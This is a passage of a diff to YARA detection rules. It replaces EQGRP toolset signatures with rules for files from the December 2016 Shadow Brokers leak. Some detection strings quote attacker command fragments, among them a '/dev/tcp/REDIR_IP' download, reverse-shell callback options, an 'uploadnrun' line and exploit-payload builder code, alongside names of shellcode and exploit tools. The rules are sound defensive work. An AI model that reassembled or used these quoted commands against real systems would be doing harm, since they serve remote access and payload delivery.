-			0A 00 00 00 00 25 64 20 2D 20 25 64 0A 00 00 00
-			00 25 64 20 2D 20 25 64 }
+		$0x401d20 = { 8B 0D ?? ?? ?? ?? 33 C0 85 C9 }
+		$0x401d30 = { 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 04 83 F8 ?? }
+		$0x401d46 = { 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 10 83 F8 ?? }
+		$0x401d76 = { 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 1C 83 F8 ?? }
+		$0x401dc4 = { 56 57 B9 ?? ?? ?? ?? BE ?? ?? ?? ?? BF ?? ?? ?? ?? 33 C0 F3 A5 5F C7 05 ?? ?? ?? ?? ?? ?? ?? ?? 5E C3 }
+		$0x401bd0 = { 55 8B EC B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 53 56 57 85 C0 C7 45 FC ?? ?? ?? ?? }
+		$0x401bf4 = { 8B 45 14 85 C0 }
+		$0x401bff = { 8B 45 18 85 C0 }
+		$0x401c14 = { 8B 7D 08 8D 45 FC 50 57 E8 ?? ?? ?? ?? 8B 75 ?? 83 C4 08 66 }
+		$0x401c31 = { 8B 45 0C 85 C0 }
+		$0x401c3c = { 8D 4D FC 51 57 E8 ?? ?? ?? ?? 66 8B 55 FC 83 C4 08 66 3B 55 24 }
+		$0x401c57 = { 8B 5D 20 85 DB }
+		$0x401c62 = { 57 E8 ?? ?? ?? ?? 8B D0 83 C4 04 83 FA ?? }
+		$0x401c72 = { B9 ?? ?? ?? ?? 33 C0 8D BD 48 EE FF FF C7 85 44 EE FF FF ?? ?? ?? ?? F3 AB 8B 4D 0C 8D 85 44 EE FF FF 50 6A ?? 81 E6 FF FF 00 00 6A ?? 56 51 53 52 E8 ?? ?? ?? ?? 83 C4 1C 85 C0 }
+		$0x401caf = { 8B 45 1C 8B 4D 18 8D 95 44 EE FF FF 52 8B 55 14 50 51 52 E8 ?? ?? ?? ?? 8B F0 8D 85 44 EE FF FF 50 E8 ?? ?? ?? ?? 83 C4 14 8B C6 5F 5E 5B 8B E5 5D C3 }
+		$0x401ce1 = { 5F 5E B8 ?? ?? ?? ?? 5B 8B E5 5D C3 }
+		$0x401ced = { 5F 5E B8 ?? ?? ?? ?? 5B 8B E5 5D C3 }
+		$0x401cf9 = { 5F 5E B8 ?? ?? ?? ?? 5B 8B E5 5D C3 }
+		$0x401d05 = { 5F 5E B8 ?? ?? ?? ?? 5B 8B E5 5D C3 }
+		$0x401d16 = { 5F 5E 5B 8B E5 5D C3 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 50KB and $s1
+		all of them
 }
-rule SIGNATURE_BASE_EQGRP_Dn_1_0_2_1 : FILE
+rule SIGNATURE_BASE_FVEY_Shadowbroker_Auct_Dez16_Strings : FILE
 {
 	meta:
-		description = "Detects tool from EQGRP toolset - file dn.1.0.2.1.linux"
+		description = "String from the ShodowBroker Files Screenshots - Dec 2016"
 		author = "Florian Roth (Nextron Systems)"
-		id = "24b5fb51-2463-56ef-818a-949b4b3bbf5b"
-		date = "2016-08-15"
+		id = "b1454c5d-01bc-599b-815c-aa1a3c52be3f"
+		date = "2016-12-17"
 		modified = "2023-12-05"
-		reference = "Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp.yar#L136-L152"
+		reference = "https://bit.no.com:43110/theshadowbrokers.bit/post/message6/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_fvey_shadowbroker_dec16.yar#L11-L71"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "9b6420401419b280f01f7fc73412386a19e94a57e589a043b231b6a721585c99"
-		score = 75
-		quality = 85
+		logic_hash = "3c632d90c5b26b840b267647faf453f85496b78c900910ad22896698c553c949"
+		score = 60
+		quality = 60
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "Valid commands are: SMAC, DMAC, INT, PACK, DONE, GO" fullword ascii
-		$s2 = "invalid format suggest DMAC=00:00:00:00:00:00" fullword ascii
-		$s3 = "SMAC=%02x:%02x:%02x:%02x:%02x:%02x" fullword ascii
-		$s4 = "Not everything is set yet" fullword ascii
+		$s1 = "bs.ratload" fullword ascii
+		$s2 = "Auditcleaner" fullword ascii
+		$s3 = "bll.perlbind" fullword ascii
+		$s4 = "bll.perlcallback" fullword ascii
+		$s5 = "bll.telnet" fullword ascii
+		$s6 = "bll.tnc.gr" fullword ascii
+		$s7 = "clean_wtmps.py" fullword ascii
+		$s8 = "cmsex.auto" fullword ascii
+		$s9 = "cottonaxe" fullword ascii
+		$s10 = "dectelnet.sh" fullword ascii
+		$s11 = "elatedmonkey" fullword ascii
+		$s12 = "electricslide.pl" fullword ascii
+		$s13 = "endlessdonut" fullword ascii
+		$s14 = "solaris8shellcode" fullword ascii
+		$s15 = "solaris9shellcode" fullword ascii
+		$s16 = "solaris10shellcode" fullword ascii
+		$s17 = "ys.ratload.sh" fullword ascii
+		$elf1 = "catflap" fullword ascii
+		$elf2 = "charm_penguin" fullword ascii
+		$elf3 = "charm_hammer" fullword ascii
+		$elf4 = "charm_saver" fullword ascii
+		$elf5 = "dampcrowd" fullword ascii
+		$elf7 = "dubmoat" fullword ascii
+		$elf8 = "ebbshave" fullword ascii
+		$elf9 = "eggbasket" fullword ascii
+		$elf10 = "toffeehammer" fullword ascii
+		$elf11 = "enemyrun" fullword ascii
+		$elf12 = "envoytomato" fullword ascii
+		$elf13 = "expoxyresin" fullword ascii
+		$elf14 = "estopmoonlit" fullword ascii
+		$elf15 = "linux-exactchange" fullword ascii
+		$elf17 = "ghost_sparc" fullword ascii
+		$elf18 = "jackpop" fullword ascii
+		$elf19 = "orleans_stride" fullword ascii
+		$elf20 = "prokserver" fullword ascii
+		$elf21 = "seconddate" fullword ascii
+		$elf22 = "shentysdelight" fullword ascii
+		$elf23 = "skimcountry" fullword ascii
+		$elf24 = "slyheretic" fullword ascii
+		$elf25 = "stoicsurgeon" fullword ascii
+		$elf26 = "strifeworld" fullword ascii
+		$elf27 = "suaveeyeful" fullword ascii
+		$elf28 = "suctionchar" fullword ascii
+		$elf29 = "vs.attack.linux" fullword ascii
+		$pe1 = "charm_razor" fullword ascii wide
+		$pe2 = "charm_saver" fullword ascii wide
+		$pe3 = "ghost_x86" fullword ascii wide
 
 	condition:
-		( uint16( 0 ) == 0x457f and filesize < 30KB and 2 of them )
+		( uint16( 0 ) == 0x457f and 1 of ( $elf* ) ) or ( uint16( 0 ) == 0x5a4d and 1 of ( $pe* ) ) or 1 of ( $s* )
 }
-rule SIGNATURE_BASE_EQGRP_Morel : FILE
+rule SIGNATURE_BASE_FVEY_Shadowbroker_Violetspirit
 {
 	meta:
-		description = "Detects tool from EQGRP toolset - file morel.exe"
+		description = "Auto-generated rule - file violetspirit.README"
 		author = "Florian Roth (Nextron Systems)"
-		id = "e741b727-0e41-53d0-832c-df7f4ea7964a"
-		date = "2016-08-15"
+		id = "4efea734-8cbc-53f7-bf92-5b3253721a81"
+		date = "2016-12-17"
 		modified = "2023-12-05"
-		reference = "Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp.yar#L154-L170"
+		reference = "https://bit.no.com:43110/theshadowbrokers.bit/post/message6/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_fvey_shadowbroker_dec16.yar#L73-L86"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "463d628bb19e27e94dcccc4c7d435d86111d51aa9f77c5ca1a199d9aaa9017ba"
+		logic_hash = "01a45feb5c9f9cfe8834306993c53b1e53d79b89b07106ffec0c81cdebb8b71c"
 		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "a9152e67f507c9a179bb8478b58e5c71c444a5a39ae3082e04820a0613cd6d9f"
+		hash1 = "a55fec73595f885e43b27963afb17aee8f8eefe811ca027ef0d7721d073e67ea"
 
 	strings:
-		$s1 = "%d - %d, %d" fullword ascii
-		$s2 = "%d - %lu.%lu %d.%lu" fullword ascii
-		$s3 = "%d - %d %d" fullword ascii
+		$x1 = "-i tgt_ipaddr -h tgt_hostname" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 60KB and all of them )
+		1 of them
 }
-rule SIGNATURE_BASE_EQGRP_Bc_Parser : FILE
+rule SIGNATURE_BASE_FVEY_Shadowbroker_Gr_Gr
 {
 	meta:
-		description = "Detects tool from EQGRP toolset - file bc-parser"
+		description = "Auto-generated rule - file gr.notes"
 		author = "Florian Roth (Nextron Systems)"
-		id = "ed4523de-b126-503a-83bd-aafd8533b0e5"
-		date = "2016-08-15"
+		id = "c233159d-8d78-575b-b32b-21f704debfe2"
+		date = "2016-12-17"
 		modified = "2023-12-05"
-		reference = "Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp.yar#L172-L187"
+		reference = "https://bit.no.com:43110/theshadowbrokers.bit/post/message6/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_fvey_shadowbroker_dec16.yar#L88-L101"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "e8911acc1173e1149fd11dd795b72ba26bc654cbc7f9d95053ce420663fcafe9"
+		logic_hash = "facce45a335d7ca799d68fc26ee2bf5682cec0914502482189cd6aa496cba489"
 		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "879f2f1ae5d18a3a5310aeeafec22484607649644e5ecb7d8a72f0877ac19cee"
+		hash1 = "b2b60dce7a4cfdddbd3d3f1825f1885728956bae009de3a307342fbdeeafcb79"
 
 	strings:
-		$s1 = "*** Target may be susceptible to FALSEMOREL      ***" fullword ascii
-		$s2 = "*** Target is susceptible to FALSEMOREL          ***" fullword ascii
+		$s4 = "delete starting from: (root) LIST (root)" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x457f and 1 of them
+		1 of them
 }
-rule SIGNATURE_BASE_EQGRP_1212 : FILE
+rule SIGNATURE_BASE_FVEY_Shadowbroker_User_Tool_Yellowspirit
 {
 	meta:
-		description = "Detects tool from EQGRP toolset - file 1212.pl"
+		description = "Auto-generated rule - file user.tool.yellowspirit.COMMON"
 		author = "Florian Roth (Nextron Systems)"
-		id = "428fed4f-df5c-5fc2-ac4b-4dea69ea4f2d"
-		date = "2016-08-15"
+		id = "b1ca04e5-bac7-5247-b2d4-82c3515c92fc"
+		date = "2016-12-17"
 		modified = "2023-12-05"
-		reference = "Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp.yar#L189-L207"
+		reference = "https://bit.no.com:43110/theshadowbrokers.bit/post/message6/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_fvey_shadowbroker_dec16.yar#L103-L117"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "1be7ed8fdfaecc6e55c4d1e75cf841f4620df3d2abe6aed2761aed20c42f70bd"
+		logic_hash = "698b23cc4cc6f319ddef7a93cf7ddc83ffae1d2c2b0a9545011b51e381f8cd0c"
 		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "a7c4b718fa92934a9182567288146ffa3312d9f3edc3872478c90e0e2814078c"
 
 	strings:
-		$s1 = "if (!(($srcip,$dstip,$srcport,$dstport) = ($line=~/^([a-f0-9]{8})([a-f0-9]{8})([a-f0-9]{4})([a-f0-9]{4})$/)))" fullword ascii
-		$s2 = "$ans=\"$srcip:$srcport -> $dstip:$dstport\";" fullword ascii
-		$s3 = "return \"ERROR:$line is not a valid port\";" fullword ascii
-		$s4 = "$dstport=hextoPort($dstport);" fullword ascii
-		$s5 = "sub hextoPort" fullword ascii
-		$s6 = "$byte_table{\"$chars[$sixteens]$chars[$ones]\"}=$i;" fullword ascii
+		$s1 = "-l 19.16.1.1 -i 10.0.3.1 -n 2222 -r nscd -x 9999" fullword ascii
+		$s2 = "-s PITCH_IP -x PITCH_IP -y RHP-24 TARGET_IP" fullword ascii
 
 	condition:
-		filesize < 6KB and 4 of them
+		1 of them
 }
-rule SIGNATURE_BASE_EQGRP_1212_Dehex : FILE
+rule SIGNATURE_BASE_FVEY_Shadowbroker_Eleganteagle_Opscript_1_0_0
 {
 	meta:
-		description = "Detects tool from EQGRP toolset - from files 1212.pl, dehex.pl"
+		description = "Auto-generated rule - file eleganteagle_opscript.1.0.0.6"
 		author = "Florian Roth (Nextron Systems)"
-		id = "2cc375e6-2bff-5623-b86c-a6413f736c42"
-		date = "2016-08-15"
+		id = "22855519-160c-57cf-b610-a611ca6813ed"
+		date = "2016-12-17"
 		modified = "2023-12-05"
-		reference = "Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp.yar#L209-L226"
+		reference = "https://bit.no.com:43110/theshadowbrokers.bit/post/message6/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_fvey_shadowbroker_dec16.yar#L119-L132"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "74d1b0e820696cd5507996996bead50d283e83095bc7288a6e8e484738b6348b"
+		logic_hash = "3df5ba1a497ffe5306ed7966f25f69c30a5191e935c5638869a62b3cb2324f70"
 		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "57e223318de0a802874642652b3dc766128f25d7e8f320c6f04c6f2659bb4f7f"
 
 	strings:
-		$s1 = "return \"ERROR:$line is not a valid address\";" fullword ascii
-		$s2 = "print \"ERROR: the filename or hex representation needs to be one argument try using \\\"'s\\n\";" fullword ascii
-		$s3 = "push(@octets,$byte_table{$tempi});" fullword ascii
-		$s4 = "$byte_table{\"$chars[$sixteens]$chars[$ones]\"}=$i;" fullword ascii
-		$s5 = "print hextoIP($ARGV[0]);" fullword ascii
+		$x3 = "uploadnrun -e \"D=-ucIP_ADDRESS_OF_REDIR" ascii
 
 	condition:
-		( uint16( 0 ) == 0x2123 and filesize < 6KB and ( 5 of ( $s* ) ) ) or ( all of them )
+		1 of them
 }
-rule SIGNATURE_BASE_Install_Get_Persistent_Filenames : FILE
+rule SIGNATURE_BASE_FVEY_Shadowbroker_Opscript
 {
 	meta:
-		description = "EQGRP Toolset Firewall - file install_get_persistent_filenames"
+		description = "Auto-generated rule - file opscript.se"
 		author = "Florian Roth (Nextron Systems)"
-		id = "cf74b479-4b78-537a-878c-2f3ce004b775"
-		date = "2016-08-16"
+		id = "d00752a3-d5c2-53a7-9a83-ad31cfb534af"
+		date = "2016-12-17"
 		modified = "2023-12-05"
-		reference = "Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp.yar#L237-L250"
+		reference = "https://bit.no.com:43110/theshadowbrokers.bit/post/message6/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_fvey_shadowbroker_dec16.yar#L134-L147"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "be07e3e3e96dd4676a76b32eb8fc47b2ab1f66ebbd6c2a3f1c88fc224f9f39ef"
+		logic_hash = "23dd6d537a8639bd84ede141cca577dc91328bd293f96f865c7dedd9ef693ee3"
 		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "4a50ec4bf42087e932e9e67e0ea4c09e52a475d351981bb4c9851fda02b35291"
+		hash1 = "275c91531a9ac5a240336714093b6aa146b8d7463cb2780cfeeceaea4c789682"
 
 	strings:
-		$s1 = "Generates the persistence file name and prints it out." fullword ascii
+		$s1 = "ls -l /tmp) | bdes -k 0x4790cae5ec154ccc|" ascii
 
 	condition:
-		( uint16( 0 ) == 0x457f and all of them )
+		1 of them
 }
-rule SIGNATURE_BASE_EQGRP_Create_Dns_Injection
+rule SIGNATURE_BASE_FVEY_Shadowbroker_User_Tool_Shentysdelight
 {
 	meta:
-		description = "EQGRP Toolset Firewall - file create_dns_injection.py"
+		description = "Auto-generated rule - file user.tool.shentysdelight.COMMON"
 		author = "Florian Roth (Nextron Systems)"
-		id = "ef358ca6-ebd8-5d08-944b-f1fcd112f1f3"
-		date = "2016-08-16"
+		id = "b1ca04e5-bac7-5247-b2d4-82c3515c92fc"
+		date = "2016-12-17"
 		modified = "2023-12-05"
-		reference = "Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp.yar#L252-L266"
+		reference = "https://bit.no.com:43110/theshadowbrokers.bit/post/message6/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_fvey_shadowbroker_dec16.yar#L149-L162"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "a07cb33c459208410b326fc260e96e617385ee4eac905a92d9542cb5ec73713e"
+		logic_hash = "1acfb6aea7e208b7fd52325258219c162482deb4fa7ee87ddc4de0774e3e74f4"
 		score = 75
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "488f3cc21db0688d09e13eb85a197a1d37902612c3e302132c84e07bc42b1c32"
+		hash1 = "a564efeaae9c13fe09a27f2d62208a1dec0a19b4a156f5cfa96a0259366b8166"
 
 	strings:
-		$s1 = "Name:   A hostname: 'host.network.com', a decimal numeric offset within" fullword ascii
-		$s2 = " www.badguy.net,CNAME,1800,host.badguy.net \\\\" ascii
+		$s1 = "echo -ne \"/var/run/COLFILE\\0\"" fullword ascii
 
 	condition:
 		1 of them
 }
-rule SIGNATURE_BASE_EQGRP_Screamingplow
+rule SIGNATURE_BASE_FVEY_Shadowbroker_User_Tool_Epichero
 {
 	meta:
-		description = "EQGRP Toolset Firewall - file screamingplow.sh"
+		description = "Auto-generated rule - file user.tool.epichero.COMMON"
 		author = "Florian Roth (Nextron Systems)"
-		id = "cb535ef0-e3ea-54cc-9082-3d63cc96d93a"
-		date = "2016-08-16"
+		id = "b1ca04e5-bac7-5247-b2d4-82c3515c92fc"
+		date = "2016-12-17"
 		modified = "2023-12-05"
-		reference = "Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp.yar#L268-L282"
+		reference = "https://bit.no.com:43110/theshadowbrokers.bit/post/message6/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_fvey_shadowbroker_dec16.yar#L164-L178"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "429ff81b6079785cc45d81b5ebf8bccd49f30484ca692017b0b66484463606d4"
+		logic_hash = "36dc38f2dd630f22b87e8d9130de7d40ee3cdba45597b2b667a1a9536d990aad"
 		score = 75
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "c7f4104c4607a03a1d27c832e1ebfc6ab252a27a1709015b5f1617b534f0090a"
+		hash1 = "679d194c32cbaead7281df9afd17bca536ee9d28df917b422083ae8ed5b5c484"
 
 	strings:
-		$s1 = "What is the name of your PBD:" fullword ascii
-		$s2 = "You are now ready for a ScreamPlow" fullword ascii
+		$x2 = "-irtun TARGET_IP ISH_CALLBACK_PORT"
+		$x3 = "-O REVERSE_SHELL_CALLBACK_PORT -w HIDDEN_DIR" fullword ascii
 
 	condition:
 		1 of them
 }
-rule SIGNATURE_BASE_EQGRP_Mixtext
+rule SIGNATURE_BASE_FVEY_Shadowbroker_User_Tool
 {
 	meta:
-		description = "EQGRP Toolset Firewall - file MixText.py"
+		description = "Auto-generated rule - file user.tool.elatedmonkey"
 		author = "Florian Roth (Nextron Systems)"
-		id = "99b06100-8a05-5c22-8b7d-ed451d5f4e81"
-		date = "2016-08-16"
+		id = "b1ca04e5-bac7-5247-b2d4-82c3515c92fc"
+		date = "2016-12-17"
 		modified = "2023-12-05"
-		reference = "Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp.yar#L284-L297"
+		reference = "https://bit.no.com:43110/theshadowbrokers.bit/post/message6/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_fvey_shadowbroker_dec16.yar#L180-L193"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "cae2437124ad6e69b04a1338b651e33c7358b7fedd0613f3fa1025cf980e14ab"
+		logic_hash = "8135c07b8c217e81f7618d58c9c3da6585cdb9b8f7afab85bb6556c5b846ba64"
 		score = 75
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "e4d24e30e6cc3a0aa0032dbbd2b68c60bac216bef524eaf56296430aa05b3795"
+		hash1 = "98ae935dd9515529a34478cb82644828d94a2d273816d50485665535454e37cd"
 
 	strings:
-		$s1 = "BinStore enabled implants." fullword ascii
+		$x5 = "ELATEDMONKEY will only work of apache executes scripts" fullword ascii
 
 	condition:
 		1 of them
 }
-rule SIGNATURE_BASE_EQGRP_Tunnel_State_Reader
+rule SIGNATURE_BASE_FVEY_Shadowbroker_User_Tool_Dubmoat
 {
 	meta:
-		description = "EQGRP Toolset Firewall - file tunnel_state_reader"
+		description = "Auto-generated rule - file user.tool.dubmoat.COMMON"
 		author = "Florian Roth (Nextron Systems)"
-		id = "e48c9482-eae5-5c34-b7b2-502d0252f4a0"
-		date = "2016-08-16"
+		id = "d6c0a00b-dda9-587f-a867-f3b632edd494"
+		date = "2016-12-17"
 		modified = "2023-12-05"
-		reference = "Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp.yar#L299-L313"
+		reference = "https://bit.no.com:43110/theshadowbrokers.bit/post/message6/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_fvey_shadowbroker_dec16.yar#L195-L209"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "d0653650aad10e7ff69b7ef1e61fac64310c63cc68c6d924655f082925e4fd04"
+		logic_hash = "368c0a6a1db0003e3a2e4ec5e42a5b5563ea1c2cb89db1751226891e1f7181d8"
 		score = 75
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "49d48ca1ec741f462fde80da68b64dfa5090855647520d29e345ef563113616c"
+		hash1 = "bcd4ee336050488f5ffeb850d8eaa11eec34d8ba099b370d94d2c83f08a4d881"
 
 	strings:
-		$s1 = "Active connections will be maintained for this tunnel. Timeout:" fullword ascii
-		$s5 = "%s: compatible with BLATSTING version 1.2" fullword ascii
+		$s1 = "### Verify version on target:" fullword ascii
+		$s2 = "/current/bin/ExtractData ./utmp > dub.TARGETNAME" fullword ascii
 
 	condition:
 		1 of them
 }
-rule SIGNATURE_BASE_EQGRP_Payload
+rule SIGNATURE_BASE_FVEY_Shadowbroker_Strifeworld
 {
 	meta:
-		description = "EQGRP Toolset Firewall - file payload.py"
+		description = "Auto-generated rule - file strifeworld.1"
 		author = "Florian Roth (Nextron Systems)"
-		id = "949cb68b-e384-578c-a906-a4d9234dc668"
-		date = "2016-08-16"
+		id = "a15c2034-8394-5e62-a5f0-d1506c19e585"
+		date = "2016-12-17"
 		modified = "2023-12-05"
-		reference = "Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp.yar#L315-L329"
+		reference = "https://bit.no.com:43110/theshadowbrokers.bit/post/message6/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_fvey_shadowbroker_dec16.yar#L211-L225"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "22e2a4809f6646437ab0824238fec791f3760ac305f9c818089797b011425b3d"
+		logic_hash = "2b113b042fd62109ee3ee39515fbd22f3898abf320d75f1288ea88e40b3444c0"
 		score = 75
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "21bed6d699b1fbde74cbcec93575c9694d5bea832cd191f59eb3e4140e5c5e07"
+		hash1 = "222b00235bf143645ad0d55b2b6839febc5b570e3def00b77699915a7c9cb670"
 
 	strings:
-		$s1 = "can't find target version module!" fullword ascii
-		$s2 = "class Payload:" fullword ascii
+		$s4 = "-p -n.\" strifeworld" fullword ascii
+		$s5 = "Running STRIFEWORLD not protected" ascii
 
 	condition:
-		all of them
+		1 of them
 }
-rule SIGNATURE_BASE_EQGRP_Eligiblecandidate
+rule SIGNATURE_BASE_FVEY_Shadowbroker_User_Tool_Pork
 {
 	meta:
-		description = "EQGRP Toolset Firewall - file eligiblecandidate.py"
+		description = "Auto-generated rule - file user.tool.pork.COMMON"
 		author = "Florian Roth (Nextron Systems)"
-		id = "e084b051-4aa1-54b2-9f56-69db386b46d6"
-		date = "2016-08-16"
+		id = "ee5f88b1-6e58-5288-8b80-0d3d188e1ac6"
+		date = "2016-12-17"
 		modified = "2023-12-05"
-		reference = "Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp.yar#L331-L348"
+		reference = "https://bit.no.com:43110/theshadowbrokers.bit/post/message6/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_fvey_shadowbroker_dec16.yar#L227-L242"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "e7e1b206f9c51ffe0ab016a93d551a9ede8f87adfc38fe70278be8c2f0fe0696"
+		logic_hash = "c3f9f90f83f3672b101e52f36012c485c29840cf0b2ced00087fb27725fd1545"
 		score = 75
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "c4567c00734dedf1c875ecbbd56c1561a1610bedb4621d9c8899acec57353d86"
+		hash1 = "9c400aab74e75be8770387d35ca219285e2cedc0c7895225bbe567ce9c9dc078"
 
 	strings:
-		$o1 = "Connection timed out. Only a problem if the callback was not received." fullword ascii
-		$o2 = "Could not reliably detect cookie. Using 'session_id'..." fullword ascii
-		$c1 = "def build_exploit_payload(self,cmd=\"/tmp/httpd\"):" fullword ascii
-		$c2 = "self.build_exploit_payload(cmd)" fullword ascii
+		$x2 = "packrat -z RAT_REMOTE_NAME" fullword ascii
+		$s3 = "./client -t TIME_ADJ SPECIAL_SOURCE_PORT 127.0.0.1 TARG_PORT" ascii
+		$s4 = "mkdir TEMP_DIR; cd TEMP_DIR; cat < /dev/tcp/REDIR_IP/RED" ascii
 
 	condition:
 		1 of them
 }
-rule SIGNATURE_BASE_EQGRP_BUSURPER_2211_724
+rule SIGNATURE_BASE_FVEY_Shadowbroker_User_Tool_Ebbisland
 {
 	meta:
-		description = "EQGRP Toolset Firewall - file BUSURPER-2211-724.exe"
+		description = "Auto-generated rule - file user.tool.ebbisland.COMMON"
 		author = "Florian Roth (Nextron Systems)"
-		id = "d109210e-14df-5b90-a496-fa8a2454126b"
-		date = "2016-08-16"
+		id = "fd312ba2-d590-5007-875c-008553c2b1b9"
+		date = "2016-12-17"
